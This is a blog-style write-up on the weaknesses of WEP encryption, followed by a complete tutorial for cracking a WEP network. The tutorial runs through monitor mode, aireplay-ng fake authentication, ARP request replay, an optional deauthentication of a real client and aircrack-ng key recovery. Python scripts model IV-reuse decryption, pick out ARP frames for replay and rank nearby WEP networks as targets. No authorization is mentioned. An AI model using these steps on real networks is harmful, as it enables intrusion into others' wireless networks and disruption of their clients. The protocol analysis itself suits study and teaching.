Thanos Stantzouris Industrial Engineer & Web Developer

Good day to all of the Duthcode hackers out there, both the experienced and the knowledge-hungry! I had some free time on my hands and decided to write a story for all of you to read! I call it:

WHY WEP IS NO LONGER WITH US

In this small write-up, I will try to clarify why we no longer use Wired Equivalent Privacy (WEP) to secure our networks. But since I know you are a person of action like me, I will also include a short tutorial at the end showing how to crack a WEP-protected network, using two aireplay-ng attacks along the way: the Fake Authentication attack (to get associated with the AP) and the ARP Request Replay attack (to make the AP generate the traffic we need).

But first the Story...

The early years of WEP

WEP, or Wired Equivalent Privacy, came with the original IEEE 802.11 standard in the late 1990s and was supposed to secure previously open Wi-Fi (802.11) networks. It was designed to give wireless networks a level of privacy equivalent to that of a comparable wired network. It failed miserably.

How it works

WEP encrypts with the RC4 (Rivest Cipher 4) stream cipher. For every frame, the sender builds a per-packet RC4 key by concatenating a 24-bit initialization vector (IV) that it chooses itself with the shared secret key (40 or 104 bits, set by the user), runs RC4 to get a keystream, and XORs that keystream over the frame body plus a CRC-32 integrity check value (ICV).
The IV is transmitted in the clear in front of the ciphertext; the router, which holds the same secret key, prepends the received IV to it, regenerates the same keystream and decrypts the frame.
 

[Figure: WEP encryption steps on a network]


A quick note: RC4 itself is not what aircrack-ng exploits (the cipher has its own biases, but they are beside the point here). The problem is how WEP uses it: a tiny IV glued onto the front of the key and sent in the clear, no replay protection, and a linear CRC-32 standing in for a real message authentication code.

WEP was part of the first 802.11 standard, ratified in 1997, and shipped in the 802.11b gear that made Wi-Fi popular around 1999. In 2001, Fluhrer, Mantin and Shamir showed that the way the IV is prepended to the key leaks information about the secret key bytes, although their attack needed around 4 million captured packets to recover the key. Since then several more weaknesses have been found in the protocol, the number of packets needed has dropped to tens of thousands, and the cracking time has come down to minutes.

I once read an article, written back in 2007, reporting that a 1.7 GHz Pentium-M needed about two minutes to crack a 104-bit WEP key, with a 95% success rate. My current machine has an Intel Core i7-7700HQ at 2.80 GHz, and the largest WEP key some vendors offer is 256-bit. Note that a longer key does not save you: the attacks described below are statistical attacks on the IV handling, not brute force, so their cost grows with the number of key bytes to recover rather than exponentially with the key length. I believe you have already begun to imagine why WEP failed as an encryption protocol. [source]

Example :

152-bit and 256-bit WEP systems are available from some vendors. As with the other WEP variants, 24 bits of that are the IV, leaving 128 or 232 bits for actual protection. These 128 or 232 bits are typically entered as 32 or 58 hexadecimal characters (4 bits × 32 + 24-bit IV = 152-bit WEP key, 4 bits × 58 + 24-bit IV = 256-bit WEP key). Most devices also allow the user to enter them as 16 or 29 ASCII characters (8 bits × 16 + 24-bit IV = 152 bits, 8 bits × 29 + 24-bit IV = 256 bits). The same arithmetic applies to the standard sizes: a 64-bit ("40-bit") key is 10 hex or 5 ASCII characters, and a 128-bit ("104-bit") key is 26 hex or 13 ASCII characters, which is exactly the 13-byte key we crack at the end of this article.


Quick Steps to WEP Encryption

WEP encryption can be broken down into 4 bullets detailing its key elements:

  • Each frame is encrypted with its own RC4 keystream
  • The keystream is generated from a 24-bit initialization vector (IV) and the shared key: keystream = RC4(IV || key)
  • Ciphertext = (plaintext || CRC-32 ICV) XOR keystream, and the IV is sent in the clear in front of it
  • The IV is only 24 bits, and how it is chosen is up to the sender (many cards simply count up from 0 after every reset, others pick it at random)

 

What is the problem exactly?

Ok yeah, we got the point, WEP is shit. But why? The main reasons are:

  • The IV is too small (only 24 bits, so at most 16,777,216 different keystreams per key; a busy AP burns through them in hours, and a card that restarts its IV counter at 0 repeats them straight away)
  • The IVs are sent in plain text, so the attacker knows the first 3 bytes of the per-packet RC4 key of every single frame
  • Most of the plaintext is predictable: every data frame starts with an LLC/SNAP header whose first byte is 0xAA, which gives away the first keystream byte of every frame for free

The main result of these points is twofold. When an IV repeats, two frames share one keystream: XOR the two ciphertexts and the keystream cancels out, leaving the XOR of the two plaintexts, and any frame whose plaintext you know (or can guess) hands you the keystream for that IV and decrypts every other frame sent under it. Worse, with the first 3 key bytes and the first keystream byte known, certain "weak" IVs leak information about the next secret key byte (the Fluhrer-Mantin-Shamir attack), and the later Klein and PTW (Tews, Weinmann, Pyshkin) attacks turn every captured IV, weak or not, into a statistical vote for each key byte.

By putting all the aforementioned bullets into perspective, with the help of aircrack-ng, we can exploit this core vulnerability of WEP, crack its encryption and recover the key.
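As an added example (written for this edit, not code from the original post), here is a minimal Python model of the WEP encapsulation described in the bullets above, followed by the attacker's side of the problems just listed: IV reuse leaking plaintext XOR plaintext, and a known plaintext handing over the keystream for that IV. The key is the one cracked at the end of the article; the IV and the frame contents are constructed for the demonstration, and the key-index byte that sits after the IV in a real frame is left out.

```python
# Added example, not from the original post: a toy model of WEP encapsulation
# (RC4 over IV || key, CRC-32 ICV) and of what an attacker can do with a
# reused IV. Key, IV and frame bodies below are constructed, not captured.
import zlib
from typing import Dict, Optional, Tuple


def rc4(key: bytes, length: int) -> bytes:
    """Plain RC4: key scheduling (KSA), then `length` bytes of keystream (PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings, truncating to the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Return IV || ((plaintext || ICV) XOR RC4(IV || key)).

    The 3-byte IV is transmitted in the clear; the per-packet RC4 key is the IV
    followed by the 40- or 104-bit secret key, so its first 3 bytes are public.
    """
    assert len(iv) == 3 and len(key) in (5, 13)
    icv = zlib.crc32(plaintext).to_bytes(4, "little")   # CRC-32, not a real MAC
    keystream = rc4(iv + key, len(plaintext) + 4)
    return iv + xor(plaintext + icv, keystream)


def wep_decrypt(key: bytes, frame: bytes) -> Optional[bytes]:
    """Receiver side: rebuild the keystream from the cleartext IV, check the ICV."""
    iv, body = frame[:3], frame[3:]
    data = xor(body, rc4(iv + key, len(body)))
    plaintext, icv = data[:-4], data[-4:]
    if zlib.crc32(plaintext).to_bytes(4, "little") != icv:
        return None
    return plaintext


# --- attacker's side: captured frames only, no key ---------------------------
LLC_SNAP_IP = bytes.fromhex("aaaa030000000800")  # start of every IPv4 frame


def keystream_from_known_plaintext(frame: bytes, known: bytes) -> Tuple[bytes, bytes]:
    """Known (or guessed) plaintext XOR ciphertext = keystream bytes for this IV."""
    iv, body = frame[:3], frame[3:]
    return iv, xor(body, known)


def decrypt_with_reused_iv(frame: bytes, keystreams: Dict[bytes, bytes]) -> bytes:
    """Decrypt as much of `frame` as the keystream recovered for its IV covers."""
    iv, body = frame[:3], frame[3:]
    return xor(body, keystreams[iv])


def demo() -> dict:
    key = b"duthc0deRulez"            # the article's 13-byte (104-bit) key
    iv = bytes.fromhex("0a0b0c")      # constructed: the sender chose this IV ...
    p1 = LLC_SNAP_IP + b"GET /secret HTTP/1.0"
    p2 = LLC_SNAP_IP + b"password=hunter2"
    f1 = wep_encrypt(key, iv, p1)
    f2 = wep_encrypt(key, iv, p2)     # ... and reused it: identical keystream
    # 1) IV reuse: c1 XOR c2 == p1 XOR p2, no key material involved
    leak = xor(f1[3:], f2[3:])[: len(p2)]
    # 2) Every frame starts with LLC/SNAP, so the first keystream byte is free;
    #    here the attacker also knows all of p1 (say, a packet it caused itself).
    _, ks_first = keystream_from_known_plaintext(f1, LLC_SNAP_IP[:1])
    _, ks = keystream_from_known_plaintext(f1, p1)
    # 3) That keystream decrypts any other frame sent under the same IV
    recovered = decrypt_with_reused_iv(f2, {iv: ks})[: len(p2)]
    return {
        "leak": leak,
        "plaintext_xor": xor(p1, p2),
        "first_keystream_byte": ks_first,
        "true_first_keystream_byte": rc4(iv + key, 1),
        "recovered": recovered,
        "expected": p2,
        "known_key_prefix": f1[:3],     # the cleartext IV == first 3 RC4 key bytes
        "receiver_ok": wep_decrypt(key, f1) == p1,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:>26}: {value!r}")
```

Run it and compare `leak` with `plaintext_xor` and `recovered` with `expected`: both match without the key ever being used on the attacker's side. The real attacks go one step further and use the known key prefix plus the known first keystream byte, over tens of thousands of IVs, to recover the secret key bytes themselves.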

 

Cracking WEP Encryption with aircrack-ng

In my very humble opinion, a hacker needs to know how to exploit even the most outdated vulnerability. Also, do you think it would be wise to call yourself a hacker without knowing how to crack WEP?

Personal Experience: I remember I started wireless hacking back in 2012. Back then there was a Mobile Network Operator in Greece that installed routers with WEP as the default network privacy protocol, so I, the new wireless hacking apprentice, had a reason to learn how to crack WEP. As the years went by, even they changed to WPA2, so I never needed the WEP cracking methodology again.
That was until two months ago! DUN DUN DUUUUUN! No seriously! My father caught the drone fever and decided it would be a good idea to spend his money on a new $500 Xiaomi drone! Well, guys and gals, you guessed it: the Wi-Fi link between the drone and its smartphone app was protected with WEP! :)
There are always outdated vulnerabilities out there! Prepare for the worst, but god forbid you are not prepared for the easy stuff!
[END OF P.E]

 

Continuing:
As I have mentioned above, if you want to crack WEP you need a large number of IVs, which means a busy network. But what happens if the network you are trying to attack is idle?
You could always do what a skilled hacker has to do on most occasions: wait patiently.

But!!! We only wait if it is the last thing left for us to do!
 

Introducing the Fake Authentication

Official Description: The fake authentication attack allows you to perform the two types of WEP authentication (Open System and Shared Key) plus associate with the access point (AP). This is only useful when you need an associated MAC address in various aireplay-ng attacks and there is currently no associated client. It should be noted that the fake authentication attack does NOT generate any ARP packets. Fake authentication cannot be used to authenticate/associate with WPA/WPA2 Access Points.

We need this authentication step because an AP only accepts data frames from stations that are associated with it; frames from an unknown MAC address are dropped (and answered with a deauthentication), so without an association we cannot even start the main attack.

Associating with the AP before launching the attack

Please do not confuse this with connecting. We are not joining the target network (we do not have the key); we just complete the 802.11 authentication and association handshake so that the AP accepts frames from our MAC address and does not block our replayed packets. So let's associate with our target network.

STEP 1st | Monitor for targets

Put your wireless card in monitor mode (if NetworkManager or wpa_supplicant keeps resetting the interface, run airmon-ng check kill first):

airmon-ng start wlan0

 

And then search for targets:

airodump-ng wlan0mon

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER   AUTH   ESSID 
50:C7:BF:DC:4C:E8  -25       30       78    0   1  270  WEP  WEP             duthcode_AP              

In this result, we see that our target is duthcode_AP

  • BSSID : 50:C7:BF:DC:4C:E8
  • ENC: WEP
  • CIPHER: WEP

And once you have acquired the target's BSSID as we did, you run the following command and leave it running:

airodump-ng --bssid 50:C7:BF:DC:4C:E8 --channel 1 --write arpreplay wlan0mon

 CH  1 ][ Elapsed: 18 s ][ 2019-03-03 13:48

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 50:C7:BF:DC:4C:E8  -15 100      188     0     0    1   270  WEP  WEP         duthcode_AP

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 

 

This is a very simple command that I have used before in my previous tutorials. It goes like this:

  • airodump-ng: we use airodump-ng to capture data from a network
  • --bssid: the BSSID of the network
  • --channel: the channel the network is running on (locking to one channel matters; channel hopping would miss most of the IVs)
  • --write: write everything to files named arpreplay-01.cap, arpreplay-01.csv and so on (the number increases with every run, so check which file you actually got)

This is a monitoring process!!! Please do not close it, just leave it monitoring as is!

Notice that the AUTH field is empty and no STATION is listed: nobody is associated with this AP, so there is no traffic (and no IVs) for us to work with yet.

 

Step 2nd | Associate with the Network

To achieve this Fake Association we will use the tool aireplay-ng.

aireplay-ng --fakeauth 0 -a 50:C7:BF:DC:4C:E8 -h 00:27:19:B2:D5:65 wlan0mon

  • --fakeauth: because we want to do a Fake Authentication attack (short form: -1)
  • 0: the re-association timing in seconds; 0 means authenticate and associate once and stop (if the AP keeps dropping you, something like --fakeauth 6000 -o 1 -q 10 re-associates every 6000 seconds and sends a keep-alive every 10 seconds, as in the aireplay-ng documentation)
  • -a: MAC address of the network (the BSSID)
  • -h: MAC address of our wireless adapter (the station MAC the AP will associate)
  • wlan0mon: the name of our wireless adapter in monitor mode

To find the MAC address of our wireless adapter we type ifconfig wlan0mon, copy the first six byte groups of the unspec field and replace the hyphens with colons (ifconfig does not know the monitor-mode link type, so it dumps the address as 16 raw bytes under unspec; ip link show wlan0mon or macchanger -s wlan0mon prints it as a normal MAC):

wlan0mon: flags=867<UP,BROADCAST,NOTRAILERS,RUNNING,PROMISC,ALLMULTI>  mtu 1500
        unspec 00-27-19-B2-D5-65-30-3A-00-00-00-00-00-00-00-00  txqueuelen 1000  (UNSPEC)
        RX packets 491071  bytes 149637165 (142.7 MiB)
        RX errors 0  dropped 479748  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Here the adapter's MAC address is 00:27:19:B2:D5:65.

When we press enter and execute this command we should see OPN appear under the previously empty AUTH field, and a new client associated with the network with the same MAC address as our wireless adapter. If the AP uses Shared Key authentication instead of Open System, plain fake authentication fails; in that case aireplay-ng needs a keystream (PRGA) file captured from a real client's shared-key handshake, passed with -y, as described in the aireplay-ng documentation.

Now we need to communicate with the network in a way to force it into generating new packets with new IVs which will help us crack the key very quickly!

 

ARP Request Replay Attack

Description: The classic ARP request replay attack is the most effective way to generate new initialization vectors (IVs), and works very reliably. The program listens for an ARP packet then retransmits it back to the access point. This, in turn, causes the access point to repeat the ARP packet with a new IV. The program retransmits the same ARP packet over and over. However, each ARP packet repeated by the access point has a new IV. It is all these new IVs which allow you to determine the WEP key.[Source]

What is ARP?

ARP is the Address Resolution Protocol: a TCP/IP protocol used to convert an IP address into a physical address, such as an Ethernet (MAC) address. A host wishing to obtain a physical address broadcasts an ARP request onto the local network, and the host that owns the IP address in the request replies with its hardware address. Two properties matter for this attack: an ARP request is sent to the broadcast address, and it has a fixed size (28 bytes of ARP plus 8 bytes of LLC/SNAP header, plus WEP's 4-byte IV field and 4-byte ICV, behind the 24-byte 802.11 header: 68 bytes on the air, or 86 if the packet was padded to Ethernet's minimum payload). So aireplay-ng can pick encrypted ARP requests out of the traffic without knowing the key, and the AP happily re-broadcasts them when replayed because WEP has no replay protection.

Command:

aireplay-ng --arpreplay -b 50:C7:BF:DC:4C:E8 -h 00:27:19:B2:D5:65 wlan0mon

Very similar to the command we ran before! Just instead of --fakeauth 0 -a we wrote --arpreplay -b (short form: -3). Once you run the command, wait for an ARP packet to be sent in the air; on an idle network this can take a while, since somebody has to ARP first (if a real client is associated, one aireplay-ng --deauth 1 -a 50:C7:BF:DC:4C:E8 -c <client MAC> wlan0mon will usually make it send an ARP request when it reconnects). Once you see the ARP count in aireplay-ng and the #Data column in airodump-ng increasing very fast, you can run the cracking command.
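As an added example (not from the original post and not aireplay-ng's own code), here is a small Python script that does what the ARP replay attack relies on: it parses 802.11 data-frame headers, picks out the frames that can only be ARP requests by their size and broadcast destination (no key involved), and models the AP re-sending a replayed frame under a fresh IV. All frames are constructed; the encrypted payloads are random bytes, since their content is irrelevant to the selection. The BSSID and client MAC are the ones from the article's output.

```python
# Added example, not from the original post or from aireplay-ng: spot an
# encrypted ARP request in WEP traffic by size and destination alone, then
# model what the AP does when the same frame is replayed. All frames are
# constructed; the "ciphertext" is random bytes since its content is irrelevant.
import os
import struct
from typing import List, Optional, Set, Tuple

BROADCAST = b"\xff" * 6
# Encrypted payload of an ARP request: 4 (IV + key index) + 8 (LLC/SNAP) +
# 28 (ARP) + 4 (ICV) = 44 bytes, or 62 if the ARP was padded to Ethernet's
# 46-byte minimum. With the 24-byte 802.11 header that is 68 or 86 on the air.
ARP_PAYLOAD_LENS = {4 + 8 + 28 + 4, 4 + 8 + 46 + 4}


def wep_frame(fc0: int, fc1: int, a1: bytes, a2: bytes, a3: bytes,
              iv: bytes, body_len: int, qos: bool = False) -> bytes:
    """Build a WEP-style 802.11 frame: header, cleartext IV + key index,
    body_len bytes of (fake) ciphertext and a 4-byte (fake) encrypted ICV."""
    hdr = struct.pack("<BBH", fc0, fc1, 0) + a1 + a2 + a3 + b"\x00\x00"  # FC, duration, addrs, seq
    if qos:
        hdr += b"\x00\x00"
    return hdr + iv + b"\x00" + os.urandom(body_len + 4)


def parse_data_frame(frame: bytes) -> Optional[dict]:
    """Decode the 802.11 header fields the attack needs; None for non-data frames."""
    fc0, fc1 = frame[0], frame[1]
    if fc0 & 0x0C != 0x08:
        return None                                   # frame type is not "data"
    qos = bool(fc0 & 0x80)                            # QoS data subtype bit
    to_ds, from_ds, protected = bool(fc1 & 0x01), bool(fc1 & 0x02), bool(fc1 & 0x40)
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    if to_ds and not from_ds:                         # client -> AP
        bssid, src, dst = a1, a2, a3
    elif from_ds and not to_ds:                       # AP -> client(s)
        bssid, src, dst = a2, a3, a1
    else:                                             # ad-hoc; WDS not handled
        bssid, src, dst = a3, a2, a1
    hdr_len = 26 if qos else 24
    return dict(to_ds=to_ds, from_ds=from_ds, protected=protected, bssid=bssid,
                src=src, dst=dst, iv=frame[hdr_len:hdr_len + 3],
                payload_len=len(frame) - hdr_len)


def is_replayable_arp_request(frame: bytes, bssid: bytes) -> bool:
    """A WEP frame from a client to our AP, to the broadcast address, of exactly
    ARP-request size: the selection needs no key."""
    f = parse_data_frame(frame)
    return bool(f and f["protected"] and f["to_ds"] and f["bssid"] == bssid
                and f["dst"] == BROADCAST and f["payload_len"] in ARP_PAYLOAD_LENS)


def find_arp_candidates(capture: List[bytes], bssid: bytes) -> List[int]:
    return [i for i, fr in enumerate(capture) if is_replayable_arp_request(fr, bssid)]


def ap_relay(frame: bytes, new_iv: bytes) -> bytes:
    """What the AP does with a broadcast from an associated client: re-send it
    FromDS under its own, fresh IV. WEP does not notice that it is a replay."""
    f = parse_data_frame(frame)
    return wep_frame(0x08, 0x42, BROADCAST, f["bssid"], f["src"], new_iv, f["payload_len"] - 8)


def harvest_ivs(arp_frame: bytes, replays: int) -> Set[bytes]:
    """aireplay-ng --arpreplay in miniature: replay one frame, collect the new IVs."""
    seen = set()
    for n in range(1, replays + 1):
        seen.add(parse_data_frame(ap_relay(arp_frame, n.to_bytes(3, "little")))["iv"])
    return seen


def build_capture() -> Tuple[List[bytes], bytes]:
    """Constructed traffic: BSSID and client MAC as in the article's output."""
    ap, client = bytes.fromhex("50c7bfdc4ce8"), bytes.fromhex("002719b2d565")
    unicast = bytes.fromhex("0a0b0c0d0e0f")
    cap = [
        wep_frame(0x08, 0x41, ap, client, BROADCAST, b"\x00\x00\x01", 36),            # ARP request
        wep_frame(0x08, 0x41, ap, client, unicast, b"\x00\x00\x02", 60),              # unicast data
        wep_frame(0x08, 0x42, client, ap, ap, b"\x00\x00\x03", 36),                   # AP -> client
        wep_frame(0x08, 0x41, ap, client, BROADCAST, b"\x00\x00\x04", 500),           # big broadcast
        wep_frame(0x88, 0x41, ap, client, BROADCAST, b"\x00\x00\x05", 54, qos=True),  # padded ARP, QoS
        wep_frame(0x80, 0x00, BROADCAST, ap, ap, b"\x00\x00\x00", 40),                # beacon (mgmt)
    ]
    return cap, ap


if __name__ == "__main__":
    capture, bssid = build_capture()
    idx = find_arp_candidates(capture, bssid)
    print("replayable ARP requests at", idx)
    print("distinct IVs after 1000 replays:", len(harvest_ivs(capture[idx[0]], 1000)))
```

Only the two broadcast frames of ARP size are selected; the unicast frame, the oversized broadcast, the AP-to-client frame and the beacon are all skipped. Every replay the AP relays comes back with a new IV, which is exactly the material aircrack-ng needs.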

Cracking Command:

aircrack-ng arpreplay-01.cap

(The capture file takes the name we gave to --write, plus -01.) aircrack-ng re-reads the file as it grows and retries automatically, so you can leave it running; with the default PTW attack a 104-bit key usually falls once airodump-ng shows somewhere between 40,000 and 85,000 IVs. And that's it! Just wait a few minutes and the key will appear:

KEY FOUND! [ 64:75:74:68:63:30:64:65:52:75:6c:65:7a ] (ASCII: duthc0deRulez)
   Decrypted correctly: 100%
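Everything above was done by eye in airodump-ng's screen. As an added example (not part of the original post and not from the aircrack-ng suite), here is a Python helper that reads the CSV airodump-ng writes next to the capture (arpreplay-01.csv for the --write name used above), lists the WEP networks with their IV counts and associated stations, and says whether it is worth launching aircrack-ng yet; it also turns the ifconfig unspec field from Step 2 into a MAC address. The CSV text is constructed to follow airodump-ng's column layout, reusing the BSSID, beacon count, ESSID and client MAC from the output above; the IV counts and the two other networks are invented for the demonstration, and the column names are assumed from the airodump-ng CSV format rather than taken from the post.

```python
# Added example, not from the original post or the aircrack-ng suite: read the
# CSV that airodump-ng --write produces next to the .cap and pick WEP targets.
# SAMPLE_CSV is constructed in airodump-ng's column layout; the IV counts, the
# WPA2 neighbour and the idle third network are invented for the demo.
import csv
import io
from typing import Dict, List, Tuple

SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
50:C7:BF:DC:4C:E8, 2019-03-03 13:48:02, 2019-03-03 13:51:40,  1, 270, WEP , WEP, OPN, -15,      188,  61204,   0.  0.  0.  0,  11, duthcode_AP,
AA:BB:CC:00:11:22, 2019-03-03 13:48:05, 2019-03-03 13:51:40,  6, 130, WPA2, CCMP, PSK, -60,      120,      0,   0.  0.  0.  0,   8, neighbor,
DE:AD:BE:EF:00:01, 2019-03-03 13:48:07, 2019-03-03 13:51:39, 11,  54, WEP , WEP,    , -70,       40,    512,   0.  0.  0.  0,   5, idle5,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:27:19:B2:D5:65, 2019-03-03 13:49:10, 2019-03-03 13:51:40, -30,     61320, 50:C7:BF:DC:4C:E8,
"""


def _table(chunk: str) -> List[Dict[str, str]]:
    """One comma-separated table with a header row -> list of row dicts."""
    rows = list(csv.reader(io.StringIO(chunk), skipinitialspace=True))
    header = [h.strip() for h in rows[0]]
    return [dict(zip(header, (c.strip() for c in row)))
            for row in rows[1:] if row and row[0].strip()]


def parse_airodump_csv(text: str) -> Tuple[List[Dict[str, str]], List[Dict[str, str]]]:
    """airodump-ng's CSV has two blank-line-separated tables: APs, then stations."""
    ap_part, _, sta_part = text.strip().partition("\n\n")
    return _table(ap_part), _table(sta_part)


def ptw_outlook(ivs: int) -> str:
    """Guidance for a 104-bit key from the figures published with the PTW attack
    (aircrack-ng's default): about 40,000 IVs for 50% success, 85,000 for 95%."""
    if ivs >= 85_000:
        return "run aircrack-ng (about 95% chance)"
    if ivs >= 40_000:
        return "worth trying aircrack-ng (about 50% chance)"
    return "keep collecting IVs"


def wep_targets(aps: List[Dict[str, str]], stations: List[Dict[str, str]]) -> List[dict]:
    """WEP networks only, busiest first, with their associated stations."""
    out = []
    for ap in aps:
        if ap["Privacy"] != "WEP":
            continue
        ivs = int(ap["# IV"])
        out.append(dict(
            bssid=ap["BSSID"], essid=ap["ESSID"], channel=int(ap["channel"]),
            auth=ap["Authentication"] or "(none seen yet)",   # empty until someone authenticates
            clients=[s["Station MAC"] for s in stations if s["BSSID"] == ap["BSSID"]],
            ivs=ivs, outlook=ptw_outlook(ivs)))
    return sorted(out, key=lambda t: -t["ivs"])


def mac_from_unspec(unspec: str) -> str:
    """ifconfig prints a monitor-mode interface's address as 16 dash-separated
    bytes under 'unspec'; the adapter MAC is the first six of them."""
    return ":".join(unspec.split("-")[:6])


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    for t in wep_targets(aps, stations):
        print(f'{t["bssid"]} ch{t["channel"]:<2} {t["essid"]:<12} auth={t["auth"]:<15} '
              f'clients={len(t["clients"])} ivs={t["ivs"]:>6}  -> {t["outlook"]}')
    print(mac_from_unspec("00-27-19-B2-D5-65-30-3A-00-00-00-00-00-00-00-00"))
```

Point it at the real arpreplay-01.csv (read the file instead of SAMPLE_CSV) while the ARP replay runs and re-run it every minute; the idle network with an empty Authentication column and no client is the situation from Step 1, where fake authentication plus ARP replay is needed before the IV counter moves at all.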

 

Because WEP is THAT vulnerable!


That was it! Thank you for reading! If you liked this article, here are some other articles that you will most definitely love:

 

You can show your support by liking our Facebook page! Support our efforts on Ko-fi! And you can get in contact with us either by sending us a message on Facebook or via the e-mail in the footer of the page!

Thanks again! Have a lovely day... Or night!